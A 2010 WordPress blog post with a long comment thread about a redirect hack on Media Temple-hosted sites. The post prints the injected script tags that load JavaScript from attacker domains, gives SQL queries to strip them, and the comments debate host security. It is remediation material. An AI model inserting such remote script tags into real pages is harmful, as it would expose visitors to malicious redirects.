DiggingIntoWordPress

by Chris Coyier & Jeff Starr

Media Temple WordPress Hack

Posted by on

It looks like Media Temple WordPress installs have been hit with a WordPress Redirect Exploit (404 link removed 2013/10/11). We got hit here at DigWP.com, but have cleaned things up and are taking steps to prevent it from happening again. Here is what Media Temple knows so far:

  • Visitors viewing posts on your blog may be redirected to a third-party site.  This may be a site already blocked by Google.
  • Visitors may  also be forwarded to the domain googlesearch.com, which has already been disabled.

They provide steps for clearing things up, but it doesn’t look like the entry-point or source of this hack is known at this point.

The hack injects a short JavaScript string into your database at the end of each your post’s content. There are (so far) two known variations of the inserted garbage:

  • <script src="http://ae.awaue.com/7"></script>
  • <script src="http://ie.eracou.com/3"></script>

To clean this up asap, backup your database and run the following SQL queries:

UPDATE wp_posts SET post_content = replace(post_content, '<script src="http://ae.awaue.com/7"></script>', '');

UPDATE wp_posts SET post_content = replace(post_content, '<script src="http://ie.eracou.com/3"></script>', '');

And remember to change the query prefix from wp_ to your custom prefix.

65 Responses

  1. Would you mind sharing if you’re on the shared or VPS enviro and if you know if the hack has affected both or just one?

    I’m reviewing our databases either way, but would be nice to quench the curiosity.

    • Jeff Starr

      The hack happened while the site was at Media Temple grid server (gs). As far as I know, this only affects sites hosted on MT (gs).

      • I 2nd that. Grid has always been a crappy technology though great in theory. Over the last couple years I’ve removed anything of my personal stuff and most clients from GS

  2. Yep. I got caught with this here night before last – was going to email you but have been busy. Glad you’ve got it sorted and will follow your steps for my WP sites.

    • Jeff Starr

      Thanks to our readers, we were able to knock this out almost as soon as it happened. The post took awhile because we actually switched servers after the event.

  3. Is this a vulnerability in the Media Temple hosting environment? Or does this hack happen on other servers?

  4. Sigh… on of my clients got hit… I think it’s past the time I get him to move OFF of MT.
    For ref he’s on grid

  5. Whoever designs a program that will protect, detect, block, live update, scan, and repair individual sites much like your typical anti virus-firewall program is going to become a very wealthy person.

    • I think such a program is impossible Steve. The analogy I always use is that a website is like a house, if someone wants to break in they’ll find a way. The only fool-proof way to prevent that break-in is to not own a house/web-site.

      • Write a script that commits files and database dumps to an external SVN server and run it through cron every so often. If it’s attacked you would be able to just roll the changes back.

      • Jeff Starr

        I second the idea of keeping current backups, using any method that fits. I’m a backup junkie, keeping hourly backups of key sites, and daily backups of others. I think it’s one of the best (and easiest) security measures possible. Essential.

        • My current backup solution is a cron script that copies everything over to Amazon S3 on a daily basis. It’s wicked cheap. :)

      • True, it would take a lot to produce and provide commercial anti hack programs. Until then the best bet is making life as difficult as possible for these hackers. To many easy targets as it stands right now.

    • VaultPress is the closest thing right now. I’m using it on CSS-Tricks and it does real-time backups and security scanning. I’m trying to get DigWP on it as soon as possible.

  6. Media Temple is saying that it was not a vulnerability in anything Media Temple specific, but this time I’m really not buying it.

    How can it specifically effect two clusters of (gs) servers, effect every single WordPress installation in the entire account, and even affect sites as hardcore locked down as this one was and not be Media Temple specific Media Temple vulnerability?

    I really like MT customer service and think they are great folks, but the (gs) platform I can absolutely not recommend.

    This site no longer runs on it. For now it’s still on Media Temple but moved to a (dv) plan which I’ve never had any trouble with at all.

    • Design Informer July 17, 2010

      Yes, I’ve heard so many complaints thus far with grid servers on Media Temple but so far, I haven’t had a problem with their VPS which I would recommend. Hey, you get what you pay for!

    • a am agree with you, GS plan is pretty unsecured and so much of problems with that, as i am a DV user, now was no such problem and just going on without any issues.

      MT guys should look around the GS infra structure urgently, because, Many bloggers using the GS, since its good price.

    • I’m guessing from the quick turn around you’ve moved it to the css-tricks server. Will this be a permanent change or are you planning on moving it to another dv/provider?

      On backup, my method is to backup each day and optimize the db an hour after the backup.

      Need to spend some time figuring out how to do a grandfather, father, son system using a single cron job.

    • Do you have a entry-level hosting service you would recomend? I’m looking to move off of my current hosting service as I’ve had bad uptime problems with them, and was considering (gs) as I’d heard so many recommend Media Temple. I can’t afford (or justify) VPS or over $20/month at the moment, so do you have another hosting service you could recommend? I’d be very interested to know; I’ve had problems with several shared hosting companies, and was hoping MT (gs) would be better…

      • Hi there,

        I swear by downtownhost; the prices are not dirt-cheap, but that’s because their technical support is top-notch, fast an dhelpful, always going beyond the call of duty, in my opinion.

        • Hmm … I’d never heard of them before. You know, the worst thing with every webhost out there is that there are plenty of people that say they’re great, and tons more that say they’re awful. I thought MT was getting more on the praise side, but now I’m hearing more problems with (gs). Plus, it is sortof pricey for shared hosting…

          Anyone else with ideas? Anyone you can suggest, Chris?

      • Jeff Starr

        I can recommend A Small Orange for inexpensive yet reliable hosting service. They do have their share of downtime, but overall they have been great. And the help-desk crew is top-notch. I posted a review several years ago – the prices may have changed a bit, but their service still rocks.

      • I have had great luck with WebFaction.com for over a year and a half now. And I’m a very picky hosting customer! Fast servers, generous plans and starts under $10/mo. I recommend them even without a promo code but if you feel like giving me credit, my referral code is my Twitter username which you can probably track down easily :-)

        • Nope, their no good either, we’re about the leave webfaction. Our shared host seems to be overloaded and they complain about us overloading the server. Our site is down frequently. They have no phone number to call and get help or information. The control panel leaves a LOT to be desired. Many missing functions that you’d expect to find in a cpanel shared hosting account.

      • Aximilation July 28, 2010

        I’ve been using linode.com for a while, $20 VPS, great track record for the last 7 years, what are you looking to host? I could cut your costs and manage a server for you if you’re interested…drop me a line webmasterATaximilation.com
        :-)

    • We would like to firmly state that there is no information indicating that our infrastructure is the source of this incident. (mt) Media Temple’s architecture is secure. Furthermore, we would like to point out that this incident is the result of insecure 3rd-party software applications installed on customer servers. These facts have been verified by a 3rd party reviewer, Sucuri (http://sucuri.net). It should also be noted that these attacks have occurred on WordPress sites residing on various (dv) Dedicated-Virtual Servers as well.

      Full details are available at: http://mdtm.pl/cg6zR2

      • Forrest July 21, 2010

        You seem to be ignoring the fact that this exploit only took place on certain hosts, including Media Temple. Secondly, if you look through the one mention of this exploit on the sucuri.net site – http://blog.sucuri.net/2010/06/bluehost-ceo-blog-and-others-exploited-by-domainameat-cc.html – you’ll notice they don’t blame WordPress anywhere. So your statement of “this incident is the result of insecure 3rd-party software” and citing Sucuri is blatantly false.

        I run a ton of WP sites, and the only ones that have had any problems have been on Media Temple.

        • I have a lot of WP blogs on Media Temple. 3 of them had been offline for over a year, and when I checked each of their databases they had the hacked code too! How does an unpublished offline domain get hacked if its not the insecure infrastructure that ties all the databases together?

      • The link provided above is to an outdated security post. Please visit this post for more up-to-date information.

  7. Sallie Goetsch (rhymes with 'sketch') July 18, 2010

    Could you use the Find & Replace plugin to do that fix?

  8. In light of the recent attacks against WordPress sites, we would like to firmly state that there is no information indicating that our infrastructure is the source of this incident. (mt) Media Temple’s architecture is secure. Furthermore, we would like to point out that this incident is the result of insecure 3rd-party software applications installed on customer servers. These facts have been verified by a 3rd party reviewer, Sucuri (http://sucuri.net).

    Full details are available at: http://mdtm.pl/cg6zR2

  9. Thanks for this! I can stop punching my face off now

  10. Not to stick up for (mt) but this also happened on a client site I have running wordpress on GoDaddy.

    The only “3rd party” plugins i’m using are:

    – Akismet
    – Google Analyticator
    – Google XML Sitemaps

    The latter being the most recent. All are up to date btw.

    I will point out that GoDaddy seems to have repaired itself (lol i know right – alien technology). Still waiting on (mt) to answer my ticket. 15 hours and counting ;)

    /shrug

  11. And now on top of both my sites being hacked the sites are down due to some kind of an issue at MT…..

  12. just reviewed 6 client sites on media temple, all clean.

    • Scratch that, a customer on a media temple gs account was just hit… hopefully the rest are ok… hard to believe its not something with the platform…

  13. I’ve run numerous Word Press sites on Media Temple GS accounts for years and have never had a problem (and their support folks are the best in the industry). After having been hacked on other servers, I’ve become very security conscious though. My passwords are long random strings as are database prefixes. I don’t install any add-ons without first editing them and correcting their security vulnerabilities (which most add-ons have!). I also have an extensive .htaccess file similar to jeff starr’s.

    A DV server is certainly more secure IF you have the unix skills to back it up. Most people (imo) don’t and inadvertently open themselves up to all sorts of attacks.

  14. In this case I would tend to believe MediaTemple that their architecture was not compromised as they have stated. The way these attacks work is a script scans a bunch of IP addresses for a specific HTTP page (in this case some WordPress Form) and then tries to submit javaScript through the Form.

    If the form handler does not correctly prevent this, it is possible to update database tables or files on the file system without having account access. Or worse, it can give them shell access to your account to do as they please. This attack is likely not coming from inside MT server/architecture and out – it is coming from an attacker script on the outside. (see XSS or Cross Site Scripting for a more technical explanation)

    The reason MediaTemple is targeted (or GoDaddy or other big name web host), is there are likely lots of vulnerable targets in that IP range and so they are sure to have a successful exploitation.

    Regarding one discussion above about commercial software that can prevent this – there are many types of enterprise level products or network appliances that do exactly this. Companies like IBM, HP, Cisco and McAfee all offer Intrusion Prevention (IPS) products which prevent web based attacks.

    There are also several Web Application Firewall products which will also intercept attempts to inject scripts.. Unfortunately – these are expensive solutions and the web host would have to implement it on their network (it is not something you can setup yourself). There are some host based solutions that do some types of prevention against web based attacks like XSS although these would likely require root access to install on your server so you may be able to use them with MT dv but not on shared gs.

    As one person mentioned, despite the best commercial protection products, someone will find a way to get around it.

    • “The way these attacks work is a script scans a bunch of IP addresses for a specific HTTP page (in this case some WordPress Form) and then tries to submit javaScript through the Form.”

      Not according to Media Temple–they say this is not a WP vulnerability.

      If MT wants to keep our trust they need to provide more information. Blaming this on mysterious “insecure 3rd-party software applications” accomplishes nothing. What 3rd-party software? This mystery application would still need the database password, right? Unless the hacker got into MT some other way–am I wrong? (Rogue employee looking to make some extra money on the side?)

      This mysterious unnamed app would need more than a password, because I have MT set to only allow access to two IP addresses. Yet I was still hacked! This wasn’t somebody cracking several passwords here at my apartment to spam one little blog with only a few visitors per month–to advertise some fake javascript app?!

      Nobody is blaming WordPress. Nobody is blaming MySQL. So what’s the problem? So how did they get into our databases?

      MT changed our MySQL passwords several times this year. If their architecture is so secure, why where they doing this? Did some hacker figure out the password generation algorithm? I don’t think so–like I said–I have IP restrictions. What am I missing?

      • I would like to help clarify a few things that you may misunderstand. Hopefully this will clear up any confusion that you have about the current situation.

        Firstly, the process described above in which javaScript is injected through a form is possible. This is not a WordPress vulnerability but rather an insecurity built into the way php functions. There are ways to secure php forms that exist on websites. This is a great guide for using form keys to secure any forms on your site from brute force attacks.

        The phrase “insecure 3rd-party software applications” simply means the common applications that can be found online. While WordPress itself is not inherently insecure, there are many customizations and things that can be done to a basic WP installation to render it insecure.

        Part of the coolness factor of WordPress and what has made it extremely popular is its openness. This is also what makes WordPress vulnerable to attack, especially through it’s open sourced additions. The most common insecurities for WordPress (or any open source CMS, ie, Joomla, Drupal) comes through 3rd-party themes and plugins. Sometimes you will also get insecurities through file permissions, however this is much more rare. You can find a good repository of exploits affecting all web applications here.

        If you have limited access to your site to only two IP addresses, that would not limit a brute force attack or malicious code being injected into your site through a vulnerability.

        With regard to the MySQL passwords being changed. That was implemented for two reasons. To deal with an ongoing “spamdexing” exploit that people were falling victim to and to remove any “clear text” database passwords stored in our system. You can read all about this incident here (404 link removed 2013/10/11).

        I hope that this helps clarify a few things for you. If you have any further questions regarding your (mt) Media Temple services, please feel free to contact us at any time.

        • Thanks for the update Travis. I love how open and sharing Media Temple is about these types of security issues.

          As logical as everything might be, I’m just extremely snake-bitten on the (gs) service and I’m not sure any amount of written or spoken logic can convince me to trust it. I’ve had sites hacked again and again and again on (gs) despite our best security efforts, not to mention the frequent downtime. Then I have a bunch of sites on (dv) as well. Never been a problem once. No hacks, no downtime, nothing. And I’ve invested seriously less time in hardcore-lockdown procedures on those sites. Is that just random? How else can it be explained? Just through my own experiences and human nature, when people ask me about Media Temple, I tell them to stay away from (gs) but (dv) is fantastic.

        • Forrest August 19, 2010

          Travis, looks like you posted yet another spin job to try and damper the bad publicity MT is getting about all this. The information you posted again contradicts with MT has said before.

          When I contacted MT support about this issue, MT support specifically blamed WordPress for the “security loophole.” MT got a lot of flak for this, and after it was pointed out it’s not true, now you guys are trying to spin it again with “This is not a WordPress vulnerability but rather an insecurity built into the way php functions.”

          Secondly, MT continues to blame third-party scripts while also stating they don’t know how the exploit was accomplished.

          So here we have MediaTemple both pointing the finger at WordPress and claiming they don’t know how this happened. The only thing MT says they are sure of is that it wasn’t a problem on MT’s system.

          This coupled with the false statements made by MT in the previous comments to this post, point out that MT is either flat out lying to people, or clueless about what’s going on. Either way, MT is showing itself to be a horrible host. Hosts can make mistakes, and it does happen. But pointing fingers, constantly changing stories… are the worst ways to overcome a mistake.

        • Also, Forrest. If you are willing to email your phone number to our VP of Customer Service, andrew at mediatemple dot net, he would be more than happy to listen to your concerns and discuss what (mt) Media Temple is doing with regard to this situation.

      • I fail to see how explaining that code injection through a php form is a possible way malicious code can be introduced onto a server through a site running WordPress is spin. This was not an attempt to explain away something but rather a way to clarify something.

        Let’s be clear, it is possible to inject malicious code into a website through a PHP form, regardless of it being a form on a WordPress site or not. I’m pretty sure that everyone would agree this is a possibility. Also, I never said, nor did anyone else state, that this is how sites on our system are being exploited, it’s simply a way they could be exploited.

        Yes, we cannot definitively point to a single point of entry for these hacks on our system. The reason being that there are a number of ways that someone with malicious intent can hack a website. We cannot rule out any on the application level. What we have ruled out, thus far, is our own system. This has been verified by us as well as third-party audits.

        I would like to know what the “false statements” made by us previously in this post are. I can assure you that everything we have stated is true. We are not changing our story either. However, as the situation is ongoing, the story is evolving as more information becomes available. This is the case with the change in how WordPress factors into everything. Here’s the our stance on WordPress, directly from our blog:

        WordPress has been mentioned a lot lately. Is this application specifically vulnerable?

        No. WordPress is a high-quality project that updates their software whenever a security problem is found. The latest versions do not contain any vulnerabilities that we are aware of. If you are running an old version, please update yourself. This is a common practice and should be familiar to any Windows or Mac OS X desktop user.

        This being said, due to the ubiquity as one of the world’s most popular open-source publishing systems, WordPress is often the target of the payload with code injections and backdoor entry points after the attackers have maliciously gained access to a user’s website. The fact that WordPress is frequently a payload target DOES NOT mean that WordPress itself is vulnerable. It just means it’s popular and very powerful. You should continue to use it and we think it’s great software.

        This is not a change in the story, simply a clarification. I don’t know who in our support department you spoke with. If this was early enough in the situation, it’s possible you were wrongly told that WordPress was the “source” of the problem. We quickly realized that this was falsely blaming WordPress itself and wanted to make sure that we differentiated between being the “source” of the problem and being “targeted.” What you construed as a company stance was, likely, a communication break down at our support level.

        • I was going to leave this alone, because I’m about to close my MT account (for different reasons) but this last post got my attention. So why not fan the fire a little more here?

          I think enough people were affected to point to a possible problem with MT.

          Why do we suspect this?

          1. Other big hosts (like Network Solution) messed up recently and allowed one hacker to attack everything. Who else, was it Godaddy? MT has an awesome track record–BUT you got to admit, MT is a big target, like these other big hosts that were targeted. We would like to think MT is smarter than Netsol (for reasons I need not explain) but is that really a valid assumption? If it looks like a duck, quacks like a duck, etc.

          When you’re big you attract enemies, that’s life. The nail that stands up gets pounded down. ALSO we (the unwashed masses) have no idea how the “grid cluster” thing works. We have pretty diagrams–as of the Cluster 6 storage meltdown–but seriously, we have no idea what’s really going on under the covers. I read all the “gs” marketing gibberish with glee but afterwards I’m still thinking I’m on a shared server. Once I had a PHP script go into a big nested loop and a tech told me I took down 80 servers on the grid or something absurd–COME ON seriously? I’m not buying it. I admit the “(gs)” marketing dept. inspired diagrams are cool looking–but I digress.

          Let’s not beat around the bush–Matt was very pissed he was blamed for Netsol’s ineptness. And I applaud Matt for standing up against those accusations. He’s got a great reputation–the guy is practically a superhero of the Internet. So I think MT is hesitant to pick a fight with Matt in any way, shape or form, because they know a storm of bad press is just around the corner if any accusation is unfair. Think about it–how many times has your host accidentally changed all your permissions, breaking your code? It’s happened to me more times than I care to remember. Oops. Hosts make mistakes like this all the time–that’s just the nature of this business.

          I give MT a lot of credit–they seem to have smart minds running the show–but anybody we can name specifically? MT doesn’t have an Internet super-action hero we can rally around, that I know of.

          2. I open a support ticket about this and a tech admits one bad one user *could* affect the entire grid. I would post a quote but it’s not worth my time. So how is this “secure” architecture? Seriously, tell me. Either you’re secure or you’re not. You need to get your story straight with your employees, or admit you are “not sure” you are secure.

          In my opinion, this is the problem with businesses today. No integrity. I haven’t taken a survey, but it seems most people hate deception. Not only that–it’s a great way to start a fight. Some fool this morning quoted my wife $49 for an oil change. Slick guy thinks he’s going to take advantage of a young woman adding extra charges beyond what he quoted her. I walk in and he’s trying to educate me about the extra charges. I say to him, “What did you quote her?” That shut him up because he’s not going to call my wife a liar. You quoted her $49 and that’s what I expect to pay, I don’t care what planet you’re on. So you think you can make a few extra dollars jerking people around? How many times has this happened to you lately? Let me tell you, it may fly for a while, but in the end you’re up against the truth, it’s not a sliding scale. It’s not about the money, it’s about the right thing to do–tell the truth as best you can. If you ignore that basic principle, even if you live in Culver City, you’re halfway up Sh** Creek. Probably your mom told you this when you were 5 y/o (age of reason? LOL) but I think some people need a reminder. A reality check is a good thing. How do you define “secure” well now you’re playing word games–please tell me what I’m missing here.

          3. Back to technical details. Only my dad’s blog was affected and he had WP version 2.8.6 running on MT. Not other scripts or sites besides boring non-executable HTML. No hardening besides the defaults. Maybe this information will help you locate the attack vector? I doubt it. Obviously it’s a somewhat dated version. It was using a default Kubrick theme and no plugins besides Akismet. That’s all I have on MT at this time–I moved all my other blogs to Linode several months ago. Why didn’t I upgrade him past 2.8.6? Besides backups, the easy ability to move elsewhere and avoiding unnecessary upgrades, the only real threat I’ve heard about, in recent history, was for blogs that allowed open registrations. The last attack WP was found at fault for–as far as I know (and I do follow these things more closely than most people) was this one checkbox “Anyone can register” where you allow anyone to register to post comments–this is really the only way to hack WP that I’ve heard about within recent history. If this box wasn’t checked you’re pretty much safe, besides brute force attacks on your password. The attacker registers to post a comment or whatever, then somehow changed his userlevel–Yes I think it was some form injection trick. If you can show me where 2.8.6 is really open to a database attack–I wouldn’t mind reading that info out of curiosity–not that it affects me much. I really don’t have much skin this game here or any personal gripe with MT, besides finding the truth about what happened. In any case, I have millions of visits on 2.8.x and 2.9.x and never any problems. But is 2.8.6 really the problem here? Is this what all the chatter is about? Were all these other MT customers using 2.8.6 through 2.x.x? I doubt it, or we would have heard something more definitive by now.

        • Forrest August 21, 2010

          Travis, your reply makes even more clear your top priority is just to spin this problem to avoid more bad PR. I didn’t say that explaining how code injection is a problem was a spin move. Nice try at putting words in my mouth to try and dispute what I wrote. It just shows you have no real argument. The problem with dealing with a lack of integrity is that it eventually comes back to bite you. And as I’m about to point out, you just dug your hole even deeper.

          Let’s be clear, it is possible to inject malicious code into a website through a PHP form, regardless of it being a form on a WordPress site or not. I’m pretty sure that everyone would agree this is a possibility. Also, I never said, nor did anyone else state, that this is how sites on our system are being exploited, it’s simply a way they could be exploited.

          Perfect example of just another attempt to spin the situation. In the information MT provided for the first month + after this issue started occurring, MT flat out blamed WordPress for the exploit and flat out blamed third-party scripts for the exploit. Now that it’s been pointed out MT also said they didn’t know how this exploit is taking place, you’re basically saying “well, all that info we posted on what happened and why it’s not a problem on our end, wasn’t how it actually happened, just how it could have happened.” It could have been an evil plot carried out by other hosts to tarnish MT’s reputation as well. Or maybe it was aliens.

          I would like to know what the “false statements” made by us previously in this post are.

          As you later noticed, one is further back in this thread. More to be brought up below.

          I can assure you that everything we have stated is true.

          This is just a prime example that you’ve been traveling down a path of untruth so far that you’re now lost in it. MT has both specifically said that:
          – This exploit was specific to WordPress
          – Is [WordPress] specifically vulnerable? No

          So which is it? You can’t have it both ways. Up until at least late July MT was saying it was specific to WP, and now MT is saying it’s not. So if everything MT has said is true, then how are these two contradictory statements possible?

          We are not changing our story either. However, as the situation is ongoing, the story is evolving as more information becomes available.

          Are you serious? You’re not changing your story, but the “story is evolving”? Evolve = change. Do you not see how completely ridiculous it is to say that you’re not changing your story, but in the very next sentence say that it’s “evolving”? Does that not sound like spin to you?

          it’s possible you were wrongly told that WordPress was the “source” of the problem.

          But wait a second, above you said “I can assure you that everything we have stated is true.” So which is it? Can you assure me MT has been truthful, or are you now saying it’s possible MT has been untruthful about the matter?

          We quickly realized that this was falsely blaming WordPress itself

          So how does “falsely blaming WordPress” constitute “everything we have stated is true”?

          Thanks for the invite to talk to your VP of customer service, but you’ve clearly demonstrated that MT is a company that believes true = false, and among other issues, I’m not going to spend more of my time on MT other than moving a client from MT and making sure others are aware of your corporate values.

          At a certain point I hope you guys notice just how badly you botched this whole situation, especially by pointing fingers.

        • Forrest-

          First, let me apologize for the tone of my previous response. It comes off as incredibly aggressive and that is not what I wanted. I simply want to make sure the correct information is getting out.

          It is clear to me that we have lost your trust. For that, I’m truly sorry. I’m sorry that you feel we have been less than forthcoming with the truth about this entire situation. That’s a clear failure with our communications and it is something that we’re trying to improve.

          As big a company as (mt) Media Temple is, we’re not a monolithic Fortune 500 company with a PR Firm on retainer to spin our crises into gold. What we are, is a group of support technicians, system engineers and customer service reps who simply want to provide the best hosting solution for our customers possible.

          I still feel like you have unanswered questions. I know that you’re leaving our service, but I still feel that you have a right to know what happened. The offer still stands to speak with our VP of Customer Service. You can also contact me any time at travis at mediatemple dot net. Let me know what your questions are and I’ll try and find someone not associated with (mt) Media Temple who can answer your questions.

  15. My personal blog which I haven’t really unleashed to the world yet runs on Mt (gs) and I found these pieces of script which I got rid of but have been searching ever since to find out what their for so thanks for the post!

  16. My site got hacked as well, all the same symtoms, however, I have no instances of either of the above mentioned scripts….

    Have any other scripts or fixes been identified?

  17. Too bad, that i haven’t found this post until today. I got all of my development installations on my (gs) account first (and leave them there for testing, extending, etc.). And all of them got hacked. Starting from 2.6 to 3.0 – Everything hacked. Even my own – pretty secure – installation. I can’t read the same text, their marketing guys are writing since a week or so on every blog and similar “it’s a 3rd party problem”. Plus: I can’t verify any of their “known issues” like new users, etc. My theme was clean (found a back up on hard disk from the day before i found the hack) and only my db was hacked. I got secure passwords etc but their answer always stays the same: “It’s not our fault”. Thanks for that info… But it’s not true. I even wrote some plugin to remove the script and offered them a version they can share with their customers… but no answer the first time and no answer after i asked them for exchanging it for some sort of partner ship. As far as i understood the behavior of (mt) right: They are simply not interested in their (gs) customers. I already got a new a new account at all-inkl and will switch when my recently paid (gs) account runs out. Getting mad about the support and the behaviour for two years is enough. (mt) => not recommended!

    • heyy, how can i get that plugin of yours to remove the script?
      my blog is filled with the stupid hack…

      thanks man!!

  18. I found the same problem on one of my servers calling a different script. Here’s the SQL statement I used (apologies if quotes get curled or HTML gets stripped):

    UPDATE dfwwptech_posts SET post_content = replace(post_content, '', '');

    If the code does get stripped, my code is the same as the code in the post, just swapping out [http://ue.oeaou.com/31] for the script src.

  19. For a complete newbie like myself, could somebody point to a step by step guide to ridding this script from my MySql database using PHPMyadmin? I am infested with this damn http://ue.oeaou.com/31 script and while I deleted it from a few pages that has not been enough. I need to kill it from within the posts themselves. I am assuming a search and replace type of query would work but I am not quite sure how to do it.

    Thanks in advance.

  20. Open PhpMyAdmin.
    Click the “SQL” button.
    Copy the UPDATE … statement in this post into the SQL box.
    Change the prefix wp_ to your prefix.
    Change http://ae.awaue.com/7 to whatever yours is.
    Click Execute.

  21. “Change the prefix wp_ to your prefix”

    That would be the name of the database powering the specific site in question? (I have 2).

  22. Exactly. Whatever table has the problem, you should change “wp_posts” to match your table name.

  23. I’m not a fan of PhpMyAdmin–it’s junk IMO–wouldn’t recognize my user-pass (after I changed it) for whatever reason. Maybe the real problem here is PhpMyAdmin, LOL.

    Anyway, another option is MySQL Query Browser, a free app from Sun–err Oracle. Windows, Mac and Linux versions avail. Looks like there’s a new version called “Workbench” – http://dev.mysql.com/downloads/workbench/

  24. Forrest, you’re just being an ass looking for a fight. If you don’t trust MT then just don’t use their services.

    Travis, don’t bother trying to bend over backwards to please someone who clearly just wants an argument. You guys know your stuff the best and I have not detected any dishonesty on your part. I can see the bigger picture as well as the details and I know you guys are doing all you can to pinpoint the source of the hacks. I don’t know if it’s anything to do with the grid system but I am aware that MT is not the only host to be targeted. That tells me that the grid system is no less secure than any shared environment out there (the ones that are set up correctly).

    I’m with A Small Orange at the moment while I’m building and developing my WordPress site, but after it grows a fair bit, I’ll be considering MT for my future hosting needs. By then the hack issue should (hopefully) be dealt with.

    • i don’t think forrest is looking for a fight, he wants a *good* explanation on exactly what happened on their hosting platform. i emailed travis for this information on 8/24 and am still waiting to hear back.

      whatever the problem is, media temple isn’t handling it very well.

    • Matt is correct in his response below. And not only that, but I’m hoping MT learns from their mistakes in this matter (and even Travis said there’s at least been aclear failure with our communications and it is something that we’re trying to improve), and that the facts of this whole issue are clear.

      I have not detected any dishonesty on [MT’s] part

      That just shows you haven’t put much effort into your attempt to detect dishonesty. As I previously noted, MT first blamed WordPress specifically, then backed off, then claimed they never blamed WP. The claim that they never blamed WP was 100% false. Travis even said We quickly realized that this was falsely blaming WordPress itself.

      So while you may be honest in your statement, it’s not accurate. Even MT admitted that they were falsely blaming WordPress.

      I don’t know if it’s anything to do with the grid system but I am aware that MT is not the only host to be targeted. That tells me that the grid system is no less secure than any shared environment out there (the ones that are set up correctly).

      Sorry, but that’s just bad logic. Unless you’ve done a full security audit on every host out there, you can not rationally claim that MT is “no less secure than any other shared environment”. The fact remains that the vast majority of hosts were not impacted by this exploit. It does appear a couple were. All that means is that the exploit was shared, not at what level the exploit took place or where the fault is.

      Now, I can’t claim that MT’s service is the source of the issue. There are several comments on the web about this exploit taking place even when sites were “disabled”, but obviously I can’t verify those (nor exactly what “disabled” means to them.)

      But I can point out, and will continue to do to anyone who wants to argue the facts with me on this matter, that MT botched this whole situation, wrongly pointed the finger at WP… and previously I could say that MT was still not learning from all this, and still spewing spin… but after the last response from Travis I was at least happy to see some admission of guilt at least as to how this whole issue was handled.

      Ideally they’d come back and be able to give a detailed explanation as to the specifics and thus know exactly how the hack took place. Right now it seems like they’re still of the mindset “we can secure our system, but not third party systems (eg JS, MySQL…) against attacks.” If they want to say there, fine. I realize that’s the status quo for the industry and can’t fault them for that.

      After the last response from Travis, I had let this issue go. I was glad to see his response, and know that more comments, traffic, keywords… to this page just make it come up more in Google searches which is what they don’t want, so I was trying to give them that.

      PS. Gemma, notice I never stooped so low as to sling insults MT. I suggest if you want to have this conversation, you do the same.

  25. Ash Blue October 10, 2010

    Just got hit today with a similar redirect that targets IE browsers only. Looks like it was hacked the same way that Media Temple WordPress sites were last time. I looked at CSS Tricks, but I didn’t see any IE problems. Might want to double check though (can never be too sure about these things).

Comments are closed. Contact us with any critical information. Thank you!

Code is poetry